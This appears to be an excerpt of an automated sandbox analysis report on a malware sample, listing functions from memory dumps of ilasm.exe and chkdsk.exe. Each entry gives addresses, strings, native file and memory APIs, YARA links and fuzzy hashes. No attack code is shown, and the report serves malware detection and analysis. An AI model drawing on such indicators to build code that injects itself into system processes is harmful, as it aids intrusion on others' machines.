Instruction ID: 098f8e80fce16c63f7426d3c1fa403360fa75b091a4e92f8b25b19fe31bd0b2e
Opcode Fuzzy Hash: 533d8768f2593b47520a4ab0fbd6d4d19a87c851c3ee4bd2ef1565d7e49e9658
Instruction Fuzzy Hash: 50E1BF30608741DFD725CF28C888B6AB7E1FB44314F140AAEF5A69B2E0E775E945CB52

Function 05BEBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05C27B7F
RTL: Resource at %p, xrefs: 05C27B8E
RTL: Re-Waiting, xrefs: 05C27BAC

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: dbad002b24c76e5c633ba8aa23d915adbe497f5ac3b29e0962a30910f204e545
Instruction ID: 1bef5daa0c63b91eb25fa4dbea949b1332e944fc6248a1a014336cabd773b550
Opcode Fuzzy Hash: dbad002b24c76e5c633ba8aa23d915adbe497f5ac3b29e0962a30910f204e545
Instruction Fuzzy Hash: 3A41E035704B029BCB24CE24C841B6AB7E6FF88710F040E6DE95ADB690DB71F9058B91

Function 05BEB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05C2728C

Strings

RTL: Resource at %p, xrefs: 05C272A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05C27294
RTL: Re-Waiting, xrefs: 05C272C1

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: eb2353cfc94e56e9d8d29bd5076d543da1e15a950810255434ca772dc63c8bd7
Instruction ID: c46b72020729c519df9466d65bfe506310d3406d48521388a1d95541a8c6739d
Opcode Fuzzy Hash: eb2353cfc94e56e9d8d29bd5076d543da1e15a950810255434ca772dc63c8bd7
Instruction Fuzzy Hash: 9E410C35704226ABCB21CE25CC81F6AB7E6FB84710F140A58F855EB280DB31F952DBD0

Function 05C62300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 05C6238D
___swprintf_l.LIBCMT ref: 05C623B3

Strings

%%%u, xrefs: 05C62384
]:%u, xrefs: 05C623AA

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: ac867eaaafe8ff0f3d2604f5b06a6f9a9bbcb0316b1eb37c24345f3ee8b25cd4
Instruction ID: 8da3068b197d192551e1fbba4f0b4bd6ca13015e88ae3a65011227511a706992
Opcode Fuzzy Hash: ac867eaaafe8ff0f3d2604f5b06a6f9a9bbcb0316b1eb37c24345f3ee8b25cd4
Instruction Fuzzy Hash: B1316876A002199FCB20DE29CC84BFE77FCFB44650F4559A6E949E3140EB30AB559BA0

Function 05BF7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 05BF7E8B

Strings

+, xrefs: 05BF7DE8
-, xrefs: 05BF7DDD

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction ID: 7cd7c91cfc8286296aeb2867df035efb9223c02a88dc2a06cff158aa4582ecbc
Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction Fuzzy Hash: 9691D670E0464AABDF24CE69C881ABEB7A6FF44320F5445DAEA55E72C0DF30A9498750

Function 05BB9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 05BB9175
$, xrefs: 05BB9191

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 7a27eae194cfccaf3036af042fc0bee97feacc2e3b134db60d1571422650f164
Instruction ID: 538d9c9bf90170264d70a2aa5fa08e5c013df956588b7b926fe88c2db1d2b7e4
Opcode Fuzzy Hash: 7a27eae194cfccaf3036af042fc0bee97feacc2e3b134db60d1571422650f164
Instruction Fuzzy Hash: A8813D75D002699BDB31CB54CC45BEEB7B4AF09750F0045EAEA1AB7280E7706E84DFA4

Analysis Process: chkdsk.exePID: 8000, Parent PID: 2896COMMON

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	4.1%
Signature Coverage:	2.2%
Total number of Nodes:	460
Total number of Limit Nodes:	75

Executed Functions

Function 04569320 Relevance: 39.2, Strings: 31, Instructions: 433
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

', xrefs: 045696BB
/, xrefs: 04569427
<f, xrefs: 045695AA
< , xrefs: 045696DE
Hp, xrefs: 04569624
_R, xrefs: 045695FC
FW, xrefs: 04569431
*, xrefs: 045696C9
.z, xrefs: 04569460
7M, xrefs: 045693BB
#, xrefs: 04569587
8, xrefs: 0456959C
C", xrefs: 0456961A
{", xrefs: 04569474
K, xrefs: 0456936C
%, xrefs: 04569376
, xrefs: 04569394
o, xrefs: 04569580
0', xrefs: 0456965A
A, xrefs: 0456956C
"t, xrefs: 0456953D
~, xrefs: 045694CE
#, xrefs: 0456958E
nA, xrefs: 0456943B
'D, xrefs: 0456955B
[;, xrefs: 045695E4
., xrefs: 045695A3
y,, xrefs: 04569492
h, xrefs: 04569682
F*, xrefs: 045695D6
;3, xrefs: 0456962E

Memory Dump Source

Source File: 0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp, Offset: 04560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4560000_chkdsk.jbxd

Yara matches

Similarity

API ID:
String ID: "t$#$#$%$'$'D$*$.$.z$0'$7M$8$;3$< $<f$A$C"$F*$FW$Hp$K$[;$_R$nA$o$y,${"$~$ $/$h
API String ID: 0-507472186
Opcode ID: 7f300eb803bd304406d80c811596ae028589035f1bb4c4dd97d2995f19c1e287
Instruction ID: c9811013d0204fef5eef697aa4569df2c43f00f440e013da9905160fa171421c
Opcode Fuzzy Hash: 7f300eb803bd304406d80c811596ae028589035f1bb4c4dd97d2995f19c1e287
Instruction Fuzzy Hash: 5D32AEB0D05269CBEB24CF45C898BDDBBB1BB85308F1085D9C00E6B291D7B96AC9DF54

Function 0457B5C0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00000000), ref: 0457B6A4
FindNextFileW.KERNELBASE(?,00000010), ref: 0457B6DF
FindClose.KERNELBASE(?), ref: 0457B6EA

Memory Dump Source

Source File: 0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp, Offset: 04560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4560000_chkdsk.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: f3627b3baedb9d4e2d966b25843c2382d244cfdb0dbec1f7fc6db3bc41bdd6a1
Instruction ID: 7fb60afe4a9f8cdb8c4eed1a6c1ab83b20dde9f9bd11cbc64bb2a3e11eb8939f
Opcode Fuzzy Hash: f3627b3baedb9d4e2d966b25843c2382d244cfdb0dbec1f7fc6db3bc41bdd6a1
Instruction Fuzzy Hash: 203147719006497BEB20DFA0DC85FFB777CBB8470DF144559BA05A7180DA70BA45DBA0

Function 04587450 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 0458753D

Memory Dump Source

Source File: 0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp, Offset: 04560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4560000_chkdsk.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 477f58a97ef932f71a1279cccd95bb228a367dd78ec40fe8a4dca4813d9a0388
Instruction ID: c11c46c6d280bbe5547298c1786913e0d11e26787df66b4f21d2c65c715289aa
Opcode Fuzzy Hash: 477f58a97ef932f71a1279cccd95bb228a367dd78ec40fe8a4dca4813d9a0388
Instruction Fuzzy Hash: D931BFB5A00609AFDB04DF99D881EEEB7B9AF8C714F108219F919A3240D670A951CBA4

Function 045875B0 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 04587685

Memory Dump Source

Source File: 0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp, Offset: 04560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4560000_chkdsk.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0493dabfe859718ff47aceda00552a6b7c9f430b4426196da1b76d7fd195e02b
Instruction ID: cccaf0cf84f8d5c1ae566326e962f034668ada428dc8e4c6c24a09c1bf482168
Opcode Fuzzy Hash: 0493dabfe859718ff47aceda00552a6b7c9f430b4426196da1b76d7fd195e02b
Instruction Fuzzy Hash: AA31EAB5A00609AFDB14DF99D840EEF77B9EF8C714F108609FD19A7240D770A811CBA5

Function 04587880 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(0457118B,?,045864E7,00000000,00000004,00003000,?,?,?,?,?,045864E7,0457118B,0457FF61,045864E7,00000000), ref: 04587937

Memory Dump Source

Source File: 0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp, Offset: 04560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4560000_chkdsk.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: f359f5d82faebaccd4494c43b8bee9817ba5ff76922e437d83e4df8c04e1250b
Instruction ID: a33de834b6230671050cfa31df6673595e900db2294d409ab39cbd019c3bea58
Opcode Fuzzy Hash: f359f5d82faebaccd4494c43b8bee9817ba5ff76922e437d83e4df8c04e1250b
Instruction Fuzzy Hash: 302105B5A00609AFEB10EF59DC41EAFB7B9FF88714F008509FD19A7240DB74A810CBA5

Function 04587690 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON

Download Yara Rule

APIs

NtDeleteFile.NTDLL(?), ref: 04587718

Memory Dump Source

Source File: 0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp, Offset: 04560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4560000_chkdsk.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: fef99ae8805eda17e1b638b3292ed56224c9cd73c8a113fc9df4491e960a74b9
Instruction ID: 2dfd4aa01add962aa2e0fbf51d77f4121419607b118e6d5e9856c91b8de4b578
Opcode Fuzzy Hash: fef99ae8805eda17e1b638b3292ed56224c9cd73c8a113fc9df4491e960a74b9
Instruction Fuzzy Hash: 64018B75600205BBE220BAA9DC41FAB73ACEBC5724F40850EFA19A7180DAA07910C7E1

Function 04587720 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 04587754

Memory Dump Source

Source File: 0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp, Offset: 04560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4560000_chkdsk.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: ab3c5e634df23d89e276a079ed4ca5b525763aa1515c01312f02267f7250b466
Instruction ID: 5b9f4affccba57756848060c0ffc3c7fd04f6c1f16ddd69fcfe168314883d323
Opcode Fuzzy Hash: ab3c5e634df23d89e276a079ed4ca5b525763aa1515c01312f02267f7250b466
Instruction Fuzzy Hash: 92E04F352002047BE210BA6ACC01FD7776DEFC5755F404419FA08A7141CA71791187F0

Function 050635C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050635CA

Memory Dump Source

Source File: 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: true

Associated: 0000000C.00000002.4145392650.0000000005119000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000511D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4ff0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 352e65f754e4fc50fc65035316f282124fceac373f81b0b9d5b40b0281a60581
Instruction ID: 50de1909f3495c3a5ed144e694f9fac6d0b39b3493d77ca1ab3df751de27d6c0
Opcode Fuzzy Hash: 352e65f754e4fc50fc65035316f282124fceac373f81b0b9d5b40b0281a60581
Instruction Fuzzy Hash: 40900232A0590812E1007158955870A10158BD0201FA5C421A0424568DC7958A5165B6

Function 05064650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0506465A

Memory Dump Source

Source File: 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: true

Associated: 0000000C.00000002.4145392650.0000000005119000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000511D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4ff0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c87281a1059a53a6f678eff0f02f198addc822159d9b06361d2316bd6f4fc271
Instruction ID: 511399f944d51f1ef231fe7a7089edf528879a47191b2f4cd7e4237f27203444
Opcode Fuzzy Hash: c87281a1059a53a6f678eff0f02f198addc822159d9b06361d2316bd6f4fc271
Instruction Fuzzy Hash: 30900262A019045251407158984840A60159BE13013D5C125A0554560CC6188955927D

Function 05064340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0506434A

Memory Dump Source

Source File: 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: true

Associated: 0000000C.00000002.4145392650.0000000005119000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000511D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4ff0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2f03c7ff265d1f19ba190ef70283bd959b61b980c954ca57ffa39268dd99c1b8
Instruction ID: bc12eab2226d4c89867362aef55dc8f027b75b7f0c5ca2b138f2bd5c284197f2
Opcode Fuzzy Hash: 2f03c7ff265d1f19ba190ef70283bd959b61b980c954ca57ffa39268dd99c1b8
Instruction Fuzzy Hash: AF900232A05C0422A140715898C854A40159BE0301B95C021E0424554CCA148A565375

Function 05062D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05062D1A

Memory Dump Source

Source File: 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: true

Associated: 0000000C.00000002.4145392650.0000000005119000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000511D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4ff0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0d4ff4a92a208d65b5e59ef7fa2dc8cc407292eacdcae1b253010b9f5d759d94
Instruction ID: 2e96d7d202a4ff731fab8e05f97948b4dc87aaef16336ca7b55ab84fed7b3cac
Opcode Fuzzy Hash: 0d4ff4a92a208d65b5e59ef7fa2dc8cc407292eacdcae1b253010b9f5d759d94
Instruction Fuzzy Hash: F390022A61380412E1807158A44C60E00158BD1202FD5D425A0015558CC91589695335

Function 05062D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05062D3A

Memory Dump Source

Source File: 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: true

Associated: 0000000C.00000002.4145392650.0000000005119000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000511D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4ff0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fbea94ceeca30ad32ad661d1c4916fac43fd4b6ed1940aa962c38d33ed4ff06d
Instruction ID: 0421aa18adaee56ea95b3df4d398c0d9285c64fa8e2b861a27a05070025c38cd
Opcode Fuzzy Hash: fbea94ceeca30ad32ad661d1c4916fac43fd4b6ed1940aa962c38d33ed4ff06d
Instruction Fuzzy Hash: 8E90022270180413E1407158A45C60A4015DBE1301F95D021E0414554CD91589565236

Function 05062DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05062DDA

Memory Dump Source

Source File: 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: true

Associated: 0000000C.00000002.4145392650.0000000005119000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000511D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4ff0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 741bd4fcc24e6264209349b6cb5d31af2cfa87798cafb3173337528c744d35ed
Instruction ID: 872eb074760d6666dd62ee4eb6334c91af543839d409c4562523e7f462b1b7da
Opcode Fuzzy Hash: 741bd4fcc24e6264209349b6cb5d31af2cfa87798cafb3173337528c744d35ed
Instruction Fuzzy Hash: 32900222642845626545B158944850B40169BE02417D5C022A1414950CC5269956D635

Function 05062DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05062DFA

Memory Dump Source

Source File: 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: true

Associated: 0000000C.00000002.4145392650.0000000005119000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000511D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4ff0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4ea4dfdf968222de9aefc4626a55937d44b2c6d554ad791db6efd38bf6c44159
Instruction ID: cf6b5f1ee34c41b4784eb274ee29a19fce57232d59431eef018bdb4c1e5ecb3f
Opcode Fuzzy Hash: 4ea4dfdf968222de9aefc4626a55937d44b2c6d554ad791db6efd38bf6c44159
Instruction Fuzzy Hash: 5090023260180823E1117158954870B00198BD0241FD5C422A0424558DD6568A52A135

Function 05062C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05062C6A

Memory Dump Source

Source File: 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: true

Associated: 0000000C.00000002.4145392650.0000000005119000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000511D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4ff0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 107e0fbf0b38282ac8665d2f882e39b7d1b9b5fb976d42507d552798e75ec75c
Instruction ID: 528b62a5be8144937690f83fb0507cc86ec7fe3c48ca6aba8abb012dd12c7e48
Opcode Fuzzy Hash: 107e0fbf0b38282ac8665d2f882e39b7d1b9b5fb976d42507d552798e75ec75c
Instruction Fuzzy Hash: E590023260180C52E10071589448B4A00158BE0301F95C026A0124654DC615C9517535

Function 05062C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05062C7A

Memory Dump Source

Source File: 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: true

Associated: 0000000C.00000002.4145392650.0000000005119000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000511D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4ff0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1be8f9cf030f11e5652833a685280ceaca78428393b820f0ad7fb918407ecab5
Instruction ID: 8e7e6075fe67352b4db1806d4a2fc88c2aa36d62b263873768f65da56bde365f
Opcode Fuzzy Hash: 1be8f9cf030f11e5652833a685280ceaca78428393b820f0ad7fb918407ecab5
Instruction Fuzzy Hash: A690023260188C12E1107158D44874E00158BD0301F99C421A4424658DC69589917135

Function 05062CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05062CAA

Memory Dump Source

Source File: 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: true

Associated: 0000000C.00000002.4145392650.0000000005119000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000511D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4ff0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a59ab74dcc1fe97e0cf42b4bba444d4e6157ae23ca511d1a3ceea28147d9d5fc
Instruction ID: b3bcbb42d20343a06d845f55c097b71f78fd191455e6a2ff3bd2854041494d4c
Opcode Fuzzy Hash: a59ab74dcc1fe97e0cf42b4bba444d4e6157ae23ca511d1a3ceea28147d9d5fc
Instruction Fuzzy Hash: 0590023260180812E1007598A44C64A00158BE0301F95D021A5024555EC66589916135

Function 05062F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05062F3A

Memory Dump Source

Source File: 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: true

Associated: 0000000C.00000002.4145392650.0000000005119000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000511D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4ff0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b8ce919e12c575f3099e539cfe09bc5f74da9963c0cade2dbd2affaf355fe5d7
Instruction ID: d6e072cfdcd9c43be19a3c422d8525cee5b820a83f7a38ca94f0666b9ceb7db0
Opcode Fuzzy Hash: b8ce919e12c575f3099e539cfe09bc5f74da9963c0cade2dbd2affaf355fe5d7
Instruction Fuzzy Hash: C690026274180852E10071589458B0A0015CBE1301F95C025E1064554DC619CD52613A

Function 05062FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05062FBA

Memory Dump Source

Source File: 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: true

Associated: 0000000C.00000002.4145392650.0000000005119000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000511D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4ff0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 560d03f73439a979620b431eda9828c25ad90b4a9d3ee25081540c82e61ff165
Instruction ID: c771bf1b4c20d34c3cf1e8b6f6e4bfac2ad0852e93e796af65aee5bc8bfc6c1c
Opcode Fuzzy Hash: 560d03f73439a979620b431eda9828c25ad90b4a9d3ee25081540c82e61ff165
Instruction Fuzzy Hash: B3900222A018045251407168D88890A4015AFE1211795C131A0998550DC55989655679

Function 05062FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05062FEA

Memory Dump Source

Source File: 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: true

Associated: 0000000C.00000002.4145392650.0000000005119000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000511D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4ff0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a1ff65258a1b1cd38418a18f11556d0991ff14a23975338d111d1dc65b7d0a40
Instruction ID: a72ee82c21e157351e9df2f4b390223e9dba017c8c91667bbaa438c345faab20
Opcode Fuzzy Hash: a1ff65258a1b1cd38418a18f11556d0991ff14a23975338d111d1dc65b7d0a40
Instruction Fuzzy Hash: B7900222611C0452E20075689C58B0B00158BD0303F95C125A0154554CC91589615535

Function 05062E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05062E8A

Memory Dump Source

Source File: 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: true

